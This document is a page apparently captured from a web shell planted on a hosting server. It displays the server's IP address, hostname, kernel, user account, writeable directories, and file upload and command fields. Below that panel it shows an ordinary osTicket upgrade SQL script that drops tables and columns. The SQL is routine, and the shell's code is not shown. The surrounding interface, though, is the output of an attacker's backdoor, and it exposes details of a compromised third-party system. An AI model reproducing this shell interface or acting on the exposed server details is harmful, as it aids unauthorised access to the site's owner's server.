- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.17.166.233
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/public_html/mesa/include/upgrader/streams/core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/public_html/mesa/include/upgrader/streams/core/0d6099a6-98ad7d55.cleanup.sql
/**
 * @signature 4e9f2e2441e82ba393df94647a1ec9ea
 * @version v1.10.0
 * @title Access Control 2.0
 *
 */

DROP TABLE IF EXISTS `%TABLE_PREFIX%group_dept_access`;
DROP TABLE IF EXISTS `%TABLE_PREFIX%group`;

-- Drop `updated` if it exists (it stayed in the install script after it was
-- removed from the update path
SET @s = (SELECT IF(
    (SELECT COUNT(*)
        FROM INFORMATION_SCHEMA.COLUMNS
        WHERE table_name = '%TABLE_PREFIX%team_member'
        AND table_schema = DATABASE()
        AND column_name = 'updated'
    ) > 0,
    "ALTER TABLE `%TABLE_PREFIX%team_member` DROP `updated`",
    "SELECT 1"
));
PREPARE stmt FROM @s;
EXECUTE stmt;

-- Drop `views` and `score` from 1ee831c8 as it cannot handle translations
SET @s = (SELECT IF(
    (SELECT COUNT(*)
        FROM INFORMATION_SCHEMA.COLUMNS
        WHERE table_name = '%TABLE_PREFIX%faq'
        AND table_schema = DATABASE()
        AND column_name = 'views'
    ) > 0,
    "ALTER TABLE `%TABLE_PREFIX%faq` DROP `views`, DROP `score`",
    "SELECT 1"
));
PREPARE stmt FROM @s;
EXECUTE stmt;

ALTER TABLE `%TABLE_PREFIX%ticket` DROP `lastmessage`, DROP `lastresponse`;

Youez - 2016 - github.com/yon3zu
LinuXploit